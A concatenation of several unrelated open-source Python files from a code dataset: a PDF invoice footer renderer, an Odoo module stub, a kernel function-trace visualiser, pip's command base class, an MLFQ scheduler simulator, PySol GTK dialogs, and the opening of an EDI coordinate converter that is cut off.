totals_table.drawOn(self.pdf, self.margin + left_padding, self.second_page_start_y_pos - rendered_height)
return self.second_page_start_y_pos - rendered_height - self.min_clearance
else:
totals_table.drawOn(self.pdf, self.margin + left_padding, y_pos - rendered_height)
return y_pos - rendered_height - self.min_clearance
def draw_footer(self, y_pos):
"""
Draws the footer.
"""
para_style = getSampleStyleSheet()['Normal']
para_style.fontSize = 8
footer_para = Paragraph(self.footer_text.replace("\n", "<br/>"), para_style)
disclaimer_para = Paragraph(self.disclaimer_text.replace("\n", "<br/>"), para_style)
billing_address_para = Paragraph(self.billing_address_text.replace("\n", "<br/>"), para_style)
footer_data = [
['', footer_para],
[(_('Billing Address')), ''],
['', billing_address_para],
[(_('Disclaimer')), ''],
['', disclaimer_para]
]
footer_style = [
# Styling for the entire footer table.
('ALIGN', (0, 0), (-1, -1), 'LEFT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
('FONTSIZE', (0, 0), (-1, -1), 9),
('TEXTCOLOR', (0, 0), (-1, -1), '#AAAAAA'),
# Billing Address Header styling
('LEFTPADDING', (0, 1), (0, 1), 5 * mm),
# Disclaimer Header styling
('LEFTPADDING', (0, 3), (0, 3), 5 * mm),
('TOPPADDING', (0, 3), (0, 3), 2 * mm),
# Footer Body styling
# ('BACKGROUND', (1, 0), (1, 0), '#EEEEEE'),
# Billing Address Body styling
('BACKGROUND', (1, 2), (1, 2), '#EEEEEE'),
# Disclaimer Body styling
('BACKGROUND', (1, 4), (1, 4), '#EEEEEE'),
]
if self.is_invoice:
terms_conditions_para = Paragraph(self.terms_conditions_text.replace("\n", "<br/>"), para_style)
footer_data.append([(_('TERMS AND CONDITIONS')), ''])
footer_data.append(['', terms_conditions_para])
# TERMS AND CONDITIONS header styling
footer_style.append(('LEFTPADDING', (0, 5), (0, 5), 5 * mm))
footer_style.append(('TOPPADDING', (0, 5), (0, 5), 2 * mm))
# TERMS AND CONDITIONS body styling
footer_style.append(('BACKGROUND', (1, 6), (1, 6), '#EEEEEE'))
footer_table = Table(footer_data, [5 * mm, 176 * mm])
footer_table.setStyle(TableStyle(footer_style))
__, rendered_height = footer_table.wrap(0, 0)
if y_pos - (self.margin + self.min_clearance) <= rendered_height:
self.prepare_new_page()
footer_table.drawOn(self.pdf, self.margin, self.margin + 5 * mm)
| agpl-3.0 | -7,822,837,237,229,962,000 | 37.522727 | 119 | 0.555162 | false |
PongPi/isl-odoo | addons/product_margin/wizard/__init__.py | 444 | 1078 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import product_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 7,053,722,849,262,236,000 | 42.12 | 79 | 0.61039 | false |
EPDCenter/android_kernel_rockchip_ylp | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <[email protected]>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 | 593,490,336,828,014,000 | 26.596899 | 70 | 0.673034 | false |
LChristakis/chalice-hunter | lib/python3.4/site-packages/pip/basecommand.py | 79 | 9310 | """Base Command class, and related routines"""
from __future__ import absolute_import
import logging
import os
import sys
import traceback
import optparse
import warnings
from pip._vendor.six import StringIO
from pip import cmdoptions
from pip.locations import running_under_virtualenv
from pip.download import PipSession
from pip.exceptions import (BadCommand, InstallationError, UninstallationError,
CommandError, PreviousBuildDirError)
from pip.compat import logging_dictConfig
from pip.baseparser import ConfigOptionParser, UpdatingDefaultsHelpFormatter
from pip.status_codes import (
SUCCESS, ERROR, UNKNOWN_ERROR, VIRTUALENV_NOT_FOUND,
PREVIOUS_BUILD_DIR_ERROR,
)
from pip.utils import appdirs, get_prog, normalize_path
from pip.utils.deprecation import RemovedInPip8Warning
from pip.utils.filesystem import check_path_owner
from pip.utils.logging import IndentingFormatter
from pip.utils.outdated import pip_version_check
__all__ = ['Command']
logger = logging.getLogger(__name__)
class Command(object):
name = None
usage = None
hidden = False
log_stream = "ext://sys.stdout"
def __init__(self, isolated=False):
parser_kw = {
'usage': self.usage,
'prog': '%s %s' % (get_prog(), self.name),
'formatter': UpdatingDefaultsHelpFormatter(),
'add_help_option': False,
'name': self.name,
'description': self.__doc__,
'isolated': isolated,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = '%s Options' % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(
cmdoptions.general_group,
self.parser,
)
self.parser.add_option_group(gen_opts)
def _build_session(self, options, retries=None, timeout=None):
session = PipSession(
cache=(
normalize_path(os.path.join(options.cache_dir, "http"))
if options.cache_dir else None
),
retries=retries if retries is not None else options.retries,
insecure_hosts=options.trusted_hosts,
)
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle SSL client certificate
if options.client_cert:
session.cert = options.client_cert
# Handle timeouts
if options.timeout or timeout:
session.timeout = (
timeout if timeout is not None else options.timeout
)
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def parse_args(self, args):
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
options, args = self.parse_args(args)
if options.quiet:
level = "WARNING"
elif options.verbose:
level = "DEBUG"
else:
level = "INFO"
# Compute the path for our debug log.
debug_log_path = os.path.join(appdirs.user_log_dir("pip"), "debug.log")
# Ensure that the path for our debug log is owned by the current user
# and if it is not, disable the debug log.
write_debug_log = check_path_owner(debug_log_path)
logging_dictConfig({
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"indent": {
"()": IndentingFormatter,
"format": (
"%(message)s"
if not options.log_explicit_levels
else "[%(levelname)s] %(message)s"
),
},
},
"handlers": {
"console": {
"level": level,
"class": "pip.utils.logging.ColorizedStreamHandler",
"stream": self.log_stream,
"formatter": "indent",
},
"debug_log": {
"level": "DEBUG",
"class": "pip.utils.logging.BetterRotatingFileHandler",
"filename": debug_log_path,
"maxBytes": 10 * 1000 * 1000, # 10 MB
"backupCount": 1,
"delay": True,
"formatter": "indent",
},
"user_log": {
"level": "DEBUG",
"class": "pip.utils.logging.BetterRotatingFileHandler",
"filename": options.log or "/dev/null",
"delay": True,
"formatter": "indent",
},
},
"root": {
"level": level,
"handlers": list(filter(None, [
"console",
"debug_log" if write_debug_log else None,
"user_log" if options.log else None,
])),
},
# Disable any logging besides WARNING unless we have DEBUG level
# logging enabled. These use both pip._vendor and the bare names
# for the case where someone unbundles our libraries.
"loggers": dict(
(
name,
{
"level": (
"WARNING"
if level in ["INFO", "ERROR"]
else "DEBUG"
),
},
)
for name in ["pip._vendor", "distlib", "requests", "urllib3"]
),
})
# We add this warning here instead of up above, because the logger
# hasn't been configured until just now.
if not write_debug_log:
logger.warning(
"The directory '%s' or its parent directory is not owned by "
"the current user and the debug log has been disabled. Please "
"check the permissions and owner of that directory. If "
"executing pip with sudo, you may want the -H flag.",
os.path.dirname(debug_log_path),
)
if options.log_explicit_levels:
warnings.warn(
"--log-explicit-levels has been deprecated and will be removed"
" in a future version.",
RemovedInPip8Warning,
)
# TODO: try to get these passing down from the command?
# without resorting to os.environ to hold these.
if options.no_input:
os.environ['PIP_NO_INPUT'] = '1'
if options.exists_action:
os.environ['PIP_EXISTS_ACTION'] = ' '.join(options.exists_action)
if options.require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.critical(
'Could not find an activated virtualenv (required).'
)
sys.exit(VIRTUALENV_NOT_FOUND)
# Check if we're using the latest version of pip available
if (not options.disable_pip_version_check
and not getattr(options, "no_index", False)):
with self._build_session(
options,
retries=0,
timeout=min(5, options.timeout)) as session:
pip_version_check(session)
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
return status
except PreviousBuildDirError as exc:
logger.critical(str(exc))
logger.debug('Exception information:\n%s', format_exc())
return PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError, BadCommand) as exc:
logger.critical(str(exc))
logger.debug('Exception information:\n%s', format_exc())
return ERROR
except CommandError as exc:
logger.critical('ERROR: %s', exc)
logger.debug('Exception information:\n%s', format_exc())
return ERROR
except KeyboardInterrupt:
logger.critical('Operation cancelled by user')
logger.debug('Exception information:\n%s', format_exc())
return ERROR
except:
logger.critical('Exception:\n%s', format_exc())
return UNKNOWN_ERROR
return SUCCESS
def format_exc(exc_info=None):
if exc_info is None:
exc_info = sys.exc_info()
out = StringIO()
traceback.print_exception(*exc_info, **dict(file=out))
return out.getvalue()
| mit | 446,102,189,319,639,400 | 33.481481 | 79 | 0.537594 | false |
jackyyf/ucore_os_lab | related_info/ostep/ostep9-mlfq.py | 54 | 12243 | #! /usr/bin/env python
import sys
from optparse import OptionParser
import random
# finds the highest nonempty queue
# -1 if they are all empty
def FindQueue():
q = hiQueue
while q > 0:
if len(queue[q]) > 0:
return q
q -= 1
if len(queue[0]) > 0:
return 0
return -1
def LowerQueue(currJob, currQueue, issuedIO):
if currQueue > 0:
# in this case, have to change the priority of the job
job[currJob]['currPri'] = currQueue - 1
if issuedIO == False:
queue[currQueue-1].append(currJob)
job[currJob]['ticksLeft'] = quantum[currQueue-1]
else:
if issuedIO == False:
queue[currQueue].append(currJob)
job[currJob]['ticksLeft'] = quantum[currQueue]
def Abort(str):
sys.stderr.write(str + '\n')
exit(1)
#
# PARSE ARGUMENTS
#
parser = OptionParser()
parser.add_option('-s', '--seed', default=0, help='the random seed',
action='store', type='int', dest='seed')
parser.add_option('-n', '--numQueues', help='number of queues in MLFQ (if not using -Q)', default=3,
action='store', type='int', dest='numQueues')
parser.add_option('-q', '--quantum', help='length of time slice (if not using -Q)', default=10,
action='store', type='int', dest='quantum')
parser.add_option('-Q', '--quantumList', help='length of time slice per queue level, specified as x,y,z,... where x is the quantum length for the highest priority queue, y the next highest, and so forth',
default='', action='store', type='string', dest='quantumList')
parser.add_option('-j', '--numJobs', default=3, help='number of jobs in the system',
action='store', type='int', dest='numJobs')
parser.add_option('-m', '--maxlen', default=100, help='max run-time of a job (if randomly generating)',
action='store', type='int', dest='maxlen')
parser.add_option('-M', '--maxio', default=10, help='max I/O frequency of a job (if randomly generating)',
action='store', type='int', dest='maxio')
parser.add_option('-B', '--boost', default=0, help='how often to boost the priority of all jobs back to high priority',
action='store', type='int', dest='boost')
parser.add_option('-i', '--iotime', default=5, help='how long an I/O should last (fixed constant)',
action='store', type='int', dest='ioTime')
parser.add_option('-S', '--stay', default=False, help='reset and stay at same priority level when issuing I/O',
action='store_true', dest='stay')
parser.add_option('-I', '--iobump', default=False, help='if specified, jobs that finished I/O move immediately to front of current queue',
action='store_true', dest='iobump')
parser.add_option('-l', '--jlist', default='', help='a comma-separated list of jobs to run, in the form x1,y1,z1:x2,y2,z2:... where x is start time, y is run time, and z is how often the job issues an I/O request',
action='store', type='string', dest='jlist')
parser.add_option('-c', help='compute answers for me', action='store_true', default=False, dest='solve')
(options, args) = parser.parse_args()
random.seed(options.seed)
# MLFQ: How Many Queues
numQueues = options.numQueues
quantum = {}
if options.quantumList != '':
# instead, extract number of queues and their time slic
quantumLengths = options.quantumList.split(',')
numQueues = len(quantumLengths)
qc = numQueues - 1
for i in range(numQueues):
quantum[qc] = int(quantumLengths[i])
qc -= 1
else:
for i in range(numQueues):
quantum[i] = int(options.quantum)
hiQueue = numQueues - 1
# MLFQ: I/O Model
# the time for each IO: not great to have a single fixed time but...
ioTime = int(options.ioTime)
# This tracks when IOs and other interrupts are complete
ioDone = {}
# This stores all info about the jobs
job = {}
# seed the random generator
random.seed(options.seed)
# jlist 'startTime,runTime,ioFreq:startTime,runTime,ioFreq:...'
jobCnt = 0
if options.jlist != '':
allJobs = options.jlist.split(':')
for j in allJobs:
jobInfo = j.split(',')
if len(jobInfo) != 3:
sys.stderr.write('Badly formatted job string. Should be x1,y1,z1:x2,y2,z2:...\n')
sys.stderr.write('where x is the startTime, y is the runTime, and z is the I/O frequency.\n')
exit(1)
assert(len(jobInfo) == 3)
startTime = int(jobInfo[0])
runTime = int(jobInfo[1])
ioFreq = int(jobInfo[2])
job[jobCnt] = {'currPri':hiQueue, 'ticksLeft':quantum[hiQueue], 'startTime':startTime,
'runTime':runTime, 'timeLeft':runTime, 'ioFreq':ioFreq, 'doingIO':False,
'firstRun':-1}
if startTime not in ioDone:
ioDone[startTime] = []
ioDone[startTime].append((jobCnt, 'JOB BEGINS'))
jobCnt += 1
else:
# do something random
for j in range(options.numJobs):
startTime = 0
runTime = int(random.random() * options.maxlen)
ioFreq = int(random.random() * options.maxio)
job[jobCnt] = {'currPri':hiQueue, 'ticksLeft':quantum[hiQueue], 'startTime':startTime,
'runTime':runTime, 'timeLeft':runTime, 'ioFreq':ioFreq, 'doingIO':False,
'firstRun':-1}
if startTime not in ioDone:
ioDone[startTime] = []
ioDone[startTime].append((jobCnt, 'JOB BEGINS'))
jobCnt += 1
numJobs = len(job)
print 'Here is the list of inputs:'
print 'OPTIONS jobs', numJobs
print 'OPTIONS queues', numQueues
for i in range(len(quantum)-1,-1,-1):
print 'OPTIONS quantum length for queue %2d is %3d' % (i, quantum[i])
print 'OPTIONS boost', options.boost
print 'OPTIONS ioTime', options.ioTime
print 'OPTIONS stayAfterIO', options.stay
print 'OPTIONS iobump', options.iobump
print '\n'
print 'For each job, three defining characteristics are given:'
print ' startTime : at what time does the job enter the system'
print ' runTime : the total CPU time needed by the job to finish'
print ' ioFreq : every ioFreq time units, the job issues an I/O'
print ' (the I/O takes ioTime units to complete)\n'
print 'Job List:'
for i in range(numJobs):
print ' Job %2d: startTime %3d - runTime %3d - ioFreq %3d' % (i, job[i]['startTime'],
job[i]['runTime'], job[i]['ioFreq'])
print ''
if options.solve == False:
print 'Compute the execution trace for the given workloads.'
print 'If you would like, also compute the response and turnaround'
print 'times for each of the jobs.'
print ''
print 'Use the -c flag to get the exact results when you are finished.\n'
exit(0)
# initialize the MLFQ queues
queue = {}
for q in range(numQueues):
queue[q] = []
# TIME IS CENTRAL
currTime = 0
# use these to know when we're finished
totalJobs = len(job)
finishedJobs = 0
print '\nExecution Trace:\n'
while finishedJobs < totalJobs:
# find highest priority job
# run it until either
# (a) the job uses up its time quantum
# (b) the job performs an I/O
# check for priority boost
if options.boost > 0 and currTime != 0:
if currTime % options.boost == 0:
print '[ time %d ] BOOST ( every %d )' % (currTime, options.boost)
# remove all jobs from queues (except high queue)
for q in range(numQueues-1):
for j in queue[q]:
if job[j]['doingIO'] == False:
queue[hiQueue].append(j)
queue[q] = []
# print 'BOOST: QUEUES look like:', queue
# change priority to high priority
# reset number of ticks left for all jobs (XXX just for lower jobs?)
# add to highest run queue (if not doing I/O)
for j in range(numJobs):
# print '-> Boost %d (timeLeft %d)' % (j, job[j]['timeLeft'])
if job[j]['timeLeft'] > 0:
# print '-> FinalBoost %d (timeLeft %d)' % (j, job[j]['timeLeft'])
job[j]['currPri'] = hiQueue
job[j]['ticksLeft'] = quantum[hiQueue]
# print 'BOOST END: QUEUES look like:', queue
# check for any I/Os done
if currTime in ioDone:
for (j, type) in ioDone[currTime]:
q = job[j]['currPri']
job[j]['doingIO'] = False
print '[ time %d ] %s by JOB %d' % (currTime, type, j)
if options.iobump == False:
queue[q].append(j)
else:
queue[q].insert(0, j)
# now find the highest priority job
currQueue = FindQueue()
if currQueue == -1:
print '[ time %d ] IDLE' % (currTime)
currTime += 1
continue
#print 'FOUND QUEUE: %d' % currQueue
#print 'ALL QUEUES:', queue
# there was at least one runnable job, and hence ...
currJob = queue[currQueue][0]
if job[currJob]['currPri'] != currQueue:
Abort('currPri[%d] does not match currQueue[%d]' % (job[currJob]['currPri'], currQueue))
job[currJob]['timeLeft'] -= 1
job[currJob]['ticksLeft'] -= 1
if job[currJob]['firstRun'] == -1:
job[currJob]['firstRun'] = currTime
runTime = job[currJob]['runTime']
ioFreq = job[currJob]['ioFreq']
ticksLeft = job[currJob]['ticksLeft']
timeLeft = job[currJob]['timeLeft']
print '[ time %d ] Run JOB %d at PRIORITY %d [ TICKSLEFT %d RUNTIME %d TIMELEFT %d ]' % (currTime, currJob, currQueue, ticksLeft, runTime, timeLeft)
if timeLeft < 0:
Abort('Error: should never have less than 0 time left to run')
# UPDATE TIME
currTime += 1
# CHECK FOR JOB ENDING
if timeLeft == 0:
print '[ time %d ] FINISHED JOB %d' % (currTime, currJob)
finishedJobs += 1
job[currJob]['endTime'] = currTime
# print 'BEFORE POP', queue
done = queue[currQueue].pop(0)
# print 'AFTER POP', queue
assert(done == currJob)
continue
# CHECK FOR IO
issuedIO = False
if ioFreq > 0 and (((runTime - timeLeft) % ioFreq) == 0):
# time for an IO!
print '[ time %d ] IO_START by JOB %d' % (currTime, currJob)
issuedIO = True
desched = queue[currQueue].pop(0)
assert(desched == currJob)
job[currJob]['doingIO'] = True
# this does the bad rule -- reset your tick counter if you stay at the same level
if options.stay == True:
job[currJob]['ticksLeft'] = quantum[currQueue]
# add to IO Queue: but which queue?
futureTime = currTime + ioTime
if futureTime not in ioDone:
ioDone[futureTime] = []
ioDone[futureTime].append((currJob, 'IO_DONE'))
# print 'NEW IO EVENT at ', futureTime, ' is ', ioDone[futureTime]
# CHECK FOR QUANTUM ENDING AT THIS LEVEL
if ticksLeft == 0:
# print '--> DESCHEDULE %d' % currJob
if issuedIO == False:
# print '--> BUT IO HAS NOT BEEN ISSUED (therefor pop from queue)'
desched = queue[currQueue].pop(0)
assert(desched == currJob)
# move down one queue! (unless lowest queue)
LowerQueue(currJob, currQueue, issuedIO)
# print out statistics
print ''
print 'Final statistics:'
responseSum = 0
turnaroundSum = 0
for i in range(numJobs):
response = job[i]['firstRun'] - job[i]['startTime']
turnaround = job[i]['endTime'] - job[i]['startTime']
print ' Job %2d: startTime %3d - response %3d - turnaround %3d' % (i, job[i]['startTime'],
response, turnaround)
responseSum += response
turnaroundSum += turnaround
print '\n Avg %2d: startTime n/a - response %.2f - turnaround %.2f' % (i,
float(responseSum)/numJobs,
float(turnaroundSum)/numJobs)
print '\n'
| gpl-2.0 | -7,157,397,164,516,865,000 | 36.555215 | 214 | 0.58319 | false |
TrevorLowing/PyGames | pysollib/pysolgtk/tkwidget.py | 2 | 10366 | #!/usr/bin/env python
# -*- mode: python; coding: utf-8; -*-
##---------------------------------------------------------------------------##
##
## Copyright (C) 1998-2003 Markus Franz Xaver Johannes Oberhumer
## Copyright (C) 2003 Mt. Hood Playing Card Co.
## Copyright (C) 2005-2009 Skomoroh
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
##---------------------------------------------------------------------------##
# imports
import os, sys
import gtk
gdk = gtk.gdk
# PySol imports
# Toolkit imports
from tkutil import makeToplevel, setTransient, wm_withdraw
from pysollib.mfxutil import kwdefault, KwStruct, openURL
# ************************************************************************
# *
# ************************************************************************
class _MyDialog(gtk.Dialog):
def __init__(self):
gtk.Dialog.__init__(self)
self.connect("destroy", self.quit)
self.connect("delete_event", self.quit)
def __setattr__(self, name, value):
self.__dict__[name] = value
def quit(self, *args):
self.status = 0
self.hide()
self.destroy()
gtk.main_quit()
class MfxDialog(_MyDialog):
img = {}
button_img = {}
def __init__(self, parent, title='',
timeout=0,
resizable=0,
width=-1, height=-1,
text='', justify='center',
strings=("OK",), default=0,
separator=False,
padx=20, pady=20,
bitmap=None, bitmap_side='left',
bitmap_padx=20, bitmap_pady=20,
image=None, image_side='left',
image_padx=10, image_pady=20,
**kw):
_MyDialog.__init__(self)
self.status = 1
self.button = -1
self.buttons = []
modal=True
if modal:
setTransient(self, parent)
# settings
if width > 0 or height > 0:
self.set_size_request(width, height)
#self.window.resize(width, height)
self.set_title(title)
#
self.connect('key-press-event', self._keyPressEvent)
def createBox(self, widget_class=gtk.HBox):
box = widget_class(spacing=5)
box.set_border_width(5)
self.vbox.pack_start(box)
box.show()
return box, self.action_area
createHBox = createBox
def createVBox(self):
return self.createBox(widget_class=gtk.VBox)
def createTable(self):
# FIXME
return self.createBox(widget_class=gtk.Table)
def createBitmaps(self, box, kw):
if kw['bitmap']:
stock = {"info": gtk.STOCK_DIALOG_INFO,
"error": gtk.STOCK_DIALOG_ERROR,
"warning": gtk.STOCK_DIALOG_WARNING,
"question": gtk.STOCK_DIALOG_QUESTION} [kw['bitmap']]
im = gtk.image_new_from_stock(stock, gtk.ICON_SIZE_DIALOG)
box.pack_start(im)
im.set_property('xpad', kw['bitmap_padx'])
im.set_property('ypad', kw['bitmap_pady'])
im.show()
elif kw['image']:
im = gtk.Image()
im.set_from_pixbuf(kw['image'].pixbuf)
if kw['image_side'] == 'left':
box.pack_start(im)
else:
box.pack_end(im)
im.set_property('xpad', kw['image_padx'])
im.set_property('ypad', kw['image_pady'])
im.show()
def createButtons(self, box, kw):
strings, default = kw['strings'], kw['default']
for i in range(len(strings)):
text = strings[i]
if not text:
continue
if isinstance(text, (list, tuple)):
text, index = text
else: # str
index = i
text = text.replace('&', '_')
b = gtk.Button(text)
b.set_property('can-default', True)
if index == default:
b.grab_focus()
#b.grab_default()
b.set_data("user_data", index)
b.connect("clicked", self.done)
box.pack_start(b)
b.show()
self.buttons.append(b)
def initKw(self, kw):
kwdefault(kw,
timeout=0, resizable=0,
text="", justify="center",
strings=(_("&OK"),),
default=0,
width=0,
padx=20, pady=20,
bitmap=None, bitmap_side="left",
bitmap_padx=10, bitmap_pady=20,
image=None, image_side="left",
image_padx=10, image_pady=20,
)
## # default to separator if more than one button
## sw = len(kw.strings) > 1
## kwdefault(kw.__dict__, separator=sw)
return kw
def done(self, button):
self.status = 0
self.button = button.get_data("user_data")
self.quit()
def _keyPressEvent(self, w, e):
if gdk.keyval_name(e.keyval) == 'Escape':
self.quit()
class MfxMessageDialog(MfxDialog):
def __init__(self, parent, title, **kw):
##print 'MfxMessageDialog', kw
kw = self.initKw(kw)
MfxDialog.__init__(self, parent, title, **kw)
top_box, bottom_box = self.createBox()
self.createBitmaps(top_box, kw)
label = gtk.Label(kw['text'])
label.set_justify(gtk.JUSTIFY_CENTER)
label.set_property('xpad', kw['padx'])
label.set_property('ypad', kw['pady'])
top_box.pack_start(label)
self.createButtons(bottom_box, kw)
label.show()
self.set_position(gtk.WIN_POS_CENTER_ON_PARENT)
##self.set_position(gtk.WIN_POS_CENTER)
self.show_all()
gtk.main()
def initKw(self, kw):
#if kw.has_key('bitmap'):
# kwdefault(kw, width=250, height=150)
return MfxDialog.initKw(self, kw)
# ************************************************************************
# *
# ************************************************************************
class PysolAboutDialog(MfxDialog):
def __init__(self, app, parent, title, **kw):
self._url = kw['url']
kw = self.initKw(kw)
MfxDialog.__init__(self, parent, title, **kw)
top_box, bottom_box = self.createBox()
self.createBitmaps(top_box, kw)
box = gtk.VBox()
box.set_property('border-width', 20)
top_box.pack_start(box)
label = gtk.Label(kw['text'])
label.set_justify(gtk.JUSTIFY_CENTER)
box.pack_start(label)
url_label = gtk.Label()
url_label.set_justify(gtk.JUSTIFY_CENTER)
url_label.set_markup(
'<span foreground="blue" underline="single">%s</span>' % kw['url'])
event_box = gtk.EventBox()
box.pack_start(event_box)
event_box.connect('button-press-event', self._urlClicked)
event_box.add(url_label)
self.createButtons(bottom_box, kw)
self.set_position(gtk.WIN_POS_CENTER_ON_PARENT)
##self.set_position(gtk.WIN_POS_CENTER)
self.show_all()
event_box.window.set_cursor(gdk.Cursor(gdk.HAND2))
gtk.main()
def initKw(self, kw):
#if kw.has_key('bitmap'):
# kwdefault(kw, width=250, height=150)
return MfxDialog.initKw(self, kw)
def _urlClicked(self, *args):
openURL(self._url)
# ************************************************************************
# *
# ************************************************************************
class MfxExceptionDialog(MfxDialog):
def __init__(self, parent, ex, title="Error", **kw):
kw = KwStruct(kw, bitmap="error")
text = str(kw.get("text", ""))
if text and text[-1] != "\n":
text = text + "\n"
text = text + "\n"
if isinstance(ex, EnvironmentError) and ex.filename is not None:
t = '[Errno %s] %s:\n%s' % (ex.errno, ex.strerror, repr(ex.filename))
else:
t = str(ex)
kw.text = text + t
MfxDialog.__init__(self, parent, title, **kw.__dict__)
# ************************************************************************
# *
# ************************************************************************
class MfxSimpleEntry(_MyDialog):
def __init__(self, parent, title, label, value, resizable=0, **kw):
_MyDialog.__init__(self)
self.button = 0
self.status = 1
self.value = value
self.init(parent, label, True)
self.entry.set_text(str(value))
self.set_title(title)
self.show()
gtk.main()
def init(self, parent, message="", modal=True):
if modal:
setTransient(self, parent)
box = gtk.VBox(spacing=10)
box.set_border_width(10)
self.vbox.pack_start(box)
box.show()
if message:
label = gtk.Label(message)
box.pack_start(label)
label.show()
self.entry = gtk.Entry()
box.pack_start(self.entry)
self.entry.show()
self.entry.grab_focus()
button = gtk.Button("OK")
button.connect("clicked", self.done)
button.set_flags(gtk.CAN_DEFAULT)
self.action_area.pack_start(button)
button.show()
button.grab_default()
button = gtk.Button("Cancel")
button.connect("clicked", self.quit)
button.set_flags(gtk.CAN_DEFAULT)
self.action_area.pack_start(button)
button.show()
def done(self, button):
self.status = 0
self.value = self.entry.get_text()
self.quit()
class SelectDialogTreeData:
pass
| gpl-2.0 | 8,268,712,616,668,244,000 | 30.035928 | 81 | 0.504438 | false |
geophysics/mtpy | mtpy/utils/convert_coordinates_in_edis.py | 1 | 2530 | #!/usr/bin/env python
"""
mtpy/mtpy/uofa/convert_coordinates_in_edis.py
This is a convenience script for converting coordinates in EDI files.
Files are parsed and if a 'lat' or 'lon' is detected, the argument on
the other side of an '=' is converted into decimal degrees. The rest of the file
remains unchanged.
argument:
- directory containing edi files
optional:
- output directory [default: 'decimal_degrees']
"""
import sys
import os
import os.path as op
import fnmatch
import re
import mtpy.utils.format as MTft
def main():
if len(sys.argv) < 2:
sys.exit('\nNeed at least 1 arguments:\n '
'\n <path to EDI files> \n '
'[optional: <output path>]\n')
edidir = sys.argv[1]
if not op.isdir(edidir):
print 'Given directory does not exist {0}'.format(edidir)
sys.exit()
edilist =[]
try:
edilist = fnmatch.filter(os.listdir(edidir),'*.[Ee][Dd][Ii]')
if len(edilist) == 0:
raise
edilist = [op.abspath(op.join(edidir,i)) for i in edilist]
